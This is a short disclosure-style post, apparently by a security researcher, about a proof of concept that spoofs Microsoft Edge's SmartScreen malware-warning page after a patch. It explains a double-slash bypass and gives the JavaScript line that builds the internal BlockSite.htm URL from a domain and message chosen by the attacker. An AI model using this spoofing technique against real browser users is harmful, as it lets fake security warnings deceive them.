Microsoft Edge - SmartScreen Page Spoof

The original version of this PoC was patched here, but a simple change was found the same day of the patch: instead of encoding the dot, we are now adding a double slash before the "BlockSite".

Please, read the full blog-post for more information. How to bypass the patch to keep spoofing the address bar with the Malware Warning

The Code:"ms-appx-web://microsoft.microsoftedge/assets/errorpages//BlockSite.htm?" +
"BlockedDomain=" + tUrl.value + "&Host=" + taMsg.value + "#" + tUrl.value);

Questions? Ping me at @magicmac2000